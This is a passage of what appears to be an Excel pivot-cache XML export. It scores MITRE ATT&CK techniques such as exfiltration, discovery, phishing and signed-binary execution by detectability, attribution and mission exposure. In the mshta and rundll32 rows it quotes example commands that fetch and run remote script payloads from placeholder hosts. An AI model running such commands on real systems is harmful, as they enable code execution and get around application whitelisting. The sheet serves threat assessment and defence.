    <n v="4"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Data Compressed"/>
    <x v="10"/>
    <x v="11"/>
    <s v="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
    <n v="4"/>
    <s v="Disk altered, slowness may occur"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data Encrypted"/>
    <x v="10"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="4"/>
    <s v="Disk altered, slowness may occur"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data Transfer Size Limits"/>
    <x v="10"/>
    <x v="11"/>
    <s v="An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts."/>
    <n v="2"/>
    <s v="Disk altered"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Exfiltration Over Alternative Protocol"/>
    <x v="10"/>
    <x v="11"/>
    <s v="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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Command and Control Channel"/>
    <x v="10"/>
    <x v="11"/>
    <s v="Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications."/>
    <n v="2"/>
    <s v="Size of network traffic may generated addtional indicators"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Other Network Medium"/>
    <x v="10"/>
    <x v="11"/>
    <s v="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
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Physical Medium"/>
    <x v="10"/>
    <x v="11"/>
    <s v="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
    <n v="3"/>
    <s v="Traces in registry"/>
    <n v="4"/>
    <s v="Needs close proximity of threat actor"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Scheduled Transfer"/>
    <x v="10"/>
    <x v="11"/>
    <s v="Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability._x000a__x000a_When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Pattern/filesize/protocol may trigger incident response"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="4"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <m/>
    <x v="11"/>
    <x v="12"/>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s v="Account Discovery"/>
    <x v="0"/>
    <s v="Adversaries may attempt to get a listing of local system or domain accounts."/>
    <n v="2"/>
    <s v="SOC may pick up on networked listing"/>
    <n v="1"/>
    <s v="Origin of request can be identified, does not need to be a direct connection to attacker"/>
    <n v="0"/>
    <s v="Generic request, not mission related"/>
  </r>
  <r>
    <s v="Application Window Discovery"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger"/>
    <n v="1"/>
    <s v="Needs extensive monitoring on local machine (registry and memory)"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Browser Bookmark Discovery"/>
    <x v="1"/>
    <s v="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_x000a__x000a_Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials in Files associated with logins cached by a browser._x000a__x000a_Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases"/>
    <n v="0"/>
    <s v="Hard to detect if API's are used"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="File and Directory Discovery"/>
    <x v="2"/>
    <s v="Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system."/>
    <n v="2"/>
    <s v="SOC may see increased search behavior"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="The search may reveal the type of data looking for"/>
  </r>
  <r>
    <s v="Network Service Scanning"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Share Discovery"/>
    <x v="2"/>
    <s v="Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Password Policy Discovery"/>
    <x v="1"/>
    <s v="_x000a_Password Policy Discovery_x000a_Technique_x000a_ID T1201_x000a_Tactic Discovery_x000a_Platform Linux, Windows, macOS_x000a_Permissions Required User_x000a_Data Sources Process command-line parameters, Process Monitoring_x000a_Contributors Sudhanshu Chauhan, @Sudhanshu_C_x000a_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n v="2"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Peripheral Device Discovery"/>
    <x v="1"/>
    <s v="Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Permission Groups Discovery"/>
    <x v="1"/>
    <s v="Adversaries may attempt to find local system or domain-level groups and permissions settings."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Discovery"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network."/>
    <n v="2"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Query Registry"/>
    <x v="1"/>
    <s v="Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software._x000a__x000a_The Registry contains a significant amount of information about the operating system, configuration, software, and security.1 Some of the information may help adversaries to further their operation within a network."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote System Discovery"/>
    <x v="1"/>
    <s v="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n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Security Software Discovery"/>
    <x v="1"/>
    <s v="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n v="0"/>
    <s v="Indistinguisable from legitimate traffic/activities"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Information Discovery"/>
    <x v="1"/>
    <s v="An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Network Configuration Discovery"/>
    <x v="1"/>
    <s v="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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Network Connections Discovery"/>
    <x v="1"/>
    <s v="Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network."/>
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Owner/User Discovery"/>
    <x v="1"/>
    <s v="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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Service Discovery"/>
    <x v="1"/>
    <s v="Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are &quot;sc,&quot; &quot;tasklist /svc&quot; using Tasklist, and &quot;net start&quot; using Net, but adversaries may also use other tools as well."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="System Time Discovery"/>
    <x v="1"/>
    <s v="The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.12_x000a__x000a_An adversary may gather the system time and/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2 The information could be useful for performing other techniques, such as executing a file with a Scheduled Task3, or to discover locality information based on time zone to assist in victim targeting."/>
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Drive-by Compromise"/>
    <x v="3"/>
    <s v="A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components:_x000a_Multiple ways of delivering exploit code to a browser exist, including:_x000a__x000a_A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting._x000a_Malicious ads are paid for and served through legitimate ad providers._x000a_Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content)._x000a_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1_x000a__x000a_Typical drive-by compromise process:_x000a__x000a_A user visits a website that is used to host the adversary controlled content._x000a_Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version._x000a_The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes._x000a_Upon finding a vulnerable version, exploit code is delivered to the browser._x000a_If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place._x000a_In some cases a second visit to the website after the initial scan is required before exploit code is delivered._x000a_Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ."/>
    <n v="2"/>
    <s v="Bad domains, reputation based analysis, malicious scripts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Initial phase does not demonstrate mission"/>
  </r>
  <r>
    <s v="Exploit Public-Facing Application"/>
    <x v="3"/>
    <s v="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2, standard services (like SMB3 or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.4 Depending on the flaw being exploited this may include Exploitation for Defense Evasion. For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities"/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hardware Additions"/>
    <x v="3"/>
    <s v="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6, man-in-the middle encryption breaking7, keystroke injection8, kernel memory reading via DMA9, adding new wireless access to an existing network10, and others."/>
    <n v="4"/>
    <s v="Needs physical access and may be visible for the good observer"/>
    <n v="4"/>
    <s v="Needs physical access and traces back to a threat actor"/>
    <n v="2"/>
    <s v="Threat actor may lead to objective mission"/>
  </r>
  <r>
    <s v="Replication Through Removable Media"/>
    <x v="3"/>
    <s v="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n v="4"/>
    <s v="Physical access is required, therefore detection risk"/>
    <n v="4"/>
    <s v="Physical access is required"/>
    <n v="3"/>
    <s v="Physical access is required"/>
  </r>
  <r>
    <s v="Spearphishing Attachment"/>
    <x v="4"/>
    <s v="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n v="4"/>
    <s v="Needs interaction with end user"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Spearphishing Link"/>
    <x v="4"/>
    <s v="Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment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
    <n v="2"/>
    <s v="Link may have bad reputation, malicious content"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Spearphishing via Service"/>
    <x v="4"/>
    <s v="Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels._x000a_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_x000a__x000a_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
    <n v="2"/>
    <s v="Link or file may be detected"/>
    <n v="4"/>
    <s v="Interaction target / agent is a risk"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Supply Chain Compromise"/>
    <x v="3"/>
    <s v="Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:_x000a_Manipulation of development tools_x000a_Manipulation of a development environment_x000a_Manipulation of source code repositories (public or private)_x000a_Manipulation of software update/distribution mechanisms_x000a_Compromised/infected system images (multiple cases of removable media infected at the factory)_x000a_Replacement of legitimate software with modified versions_x000a_Sales of modified/counterfeit products to legitimate distributors_x000a_Shipment interdiction_x000a_While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.111213 Targeting may be specific to a desired victim set14 or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims."/>
    <n v="2"/>
    <s v="Integrity scanning and detect unusual behavior"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trusted Relationship"/>
    <x v="3"/>
    <s v="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 used by the other party for access to internal network systems may be compromised and used."/>
    <n v="1"/>
    <s v="Uncommon data flows"/>
    <n v="1"/>
    <s v="Stepping stone party may be indicative"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Valid Accounts"/>
    <x v="3"/>
    <s v="Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access._x000a_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_x000a__x000a_Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful._x000a__x000a_The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise."/>
    <n v="3"/>
    <s v="Monitoring for unusual usage of the accounts"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="CMSTP"/>
    <x v="5"/>
    <s v="The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.1 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections._x000a__x000a_Adversaries may supply CMSTP.exe with INF files infected with malicious commands.2 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs3 and/or COM scriptlets (SCT) from remote servers.45 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application._x000a__x000a_CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface"/>
    <n v="1"/>
    <s v="Very hard to detect, inf files may reside"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Control Panel Items"/>
    <x v="5"/>
    <s v="Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.12 Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.123_x000a__x000a_For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.1_x000a__x000a_Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via Spearphishing Attachment campaigns 23 or executed as part of multi-stage malware.4 Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting."/>
    <n v="1"/>
    <s v="Disk is altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Dynamic Data Exchange"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.123_x000a__x000a_Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands45, directly or through embedded files6, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.7 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution."/>
    <n v="3"/>
    <s v="Scanning for DDEAUTO and unusual processes with Office as parent"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Execution through Module Load"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_The module loader can load DLLs:_x000a__x000a_via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;_x000a_via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);_x000a_via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;_x000a_via &lt;file name=&quot;filename.extension&quot; loadFrom=&quot;fully-qualified or relative pathname&quot;&gt; in an embedded or external &quot;application manifest&quot;. The file name refers to an entry in the IMPORT directory or a forwarded EXPORT._x000a_Adversaries can use this functionality as a way to execute arbitrary code on a system."/>
    <n v="1"/>
    <s v="Very hard to detect due to the high amount of false positives"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Client Execution"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Several types exist"/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Graphical User Interface"/>
    <x v="5"/>
    <s v="Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol."/>
    <n v="4"/>
    <s v="Gui manipulations may be visible for good observers"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="InstallUtil"/>
    <x v="5"/>
    <s v="InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft._x000a__x000a_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
    <n v="2"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="LSASS Driver"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations."/>
    <n v="2"/>
    <s v="System events and modules loaded"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Mshta"/>
    <x v="5"/>
    <s v="Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2_x000a__x000a_Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567_x000a__x000a_Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:https[:]//webserver/payload[.]sct&quot;&quot;)&quot;))_x000a__x000a_They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta_x000a__x000a_Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings."/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="Attacker server may hint towards mission's target"/>
  </r>
  <r>
    <s v="PowerShell"/>
    <x v="5"/>
    <s v="PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.1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_x000a__x000a_PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk._x000a__x000a_Administrator permissions are required to use PowerShell to connect to remote systems._x000a__x000a_A number of PowerShell-based offensive testing tools are available, including Empire,2 PowerSploit,3 and PSAttack"/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Regsvcs/Regasm"/>
    <x v="5"/>
    <s v="Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.12_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Regsvr32"/>
    <x v="5"/>
    <s v="Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.1_x000a__x000a_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_x000a__x000a_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2 This variation of the technique is often referred to as a &quot;Squiblydoo&quot; attack and has been used in campaigns targeting governments.34_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking."/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Rundll32"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1_x000a__x000a_Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; This behavior has been seen used by malware such as Poweliks"/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scheduled Task"/>
    <x v="5"/>
    <s v="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1_x000a__x000a_An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account."/>
    <n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scripting"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macos being allowed or that the user will accept to activate them._x000a__x000a_Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit1, Veil2, and PowerSploit3 are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell."/>
    <n v="3"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scripting"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macos being allowed or that the user will accept to activate them._x000a__x000a_Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit1, Veil2, and PowerSploit3 are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell."/>
    <n v="3"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Service Execution"/>
    <x v="5"/>
    <s v="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
    <n v="1"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Signed Binary Proxy Execution"/>
    <x v="5"/>
    <s v="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n v="3"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Third-party Software"/>
    <x v="5"/>
    <s v="Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code._x000a__x000a_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_x000a__x000a_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n v="3"/>
    <s v="Uncommon software may indicate"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Trap"/>
    <x v="5"/>
    <s v="The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where &quot;command list&quot; will be executed when &quot;signals&quot; are received."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Trusted Developer Utilities"/>
    <x v="5"/>
    <s v="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_x000a__x000a_MSBuild_x000a_MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.1_x000a__x000a_Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.2 MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.3_x000a__x000a_DNX_x000a_The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.4 DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft._x000a__x000a_An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.5_x000a__x000a_RCSI_x000a_The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.6 The rcsi.exe binary is signed by Microsoft.7_x000a__x000a_C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy 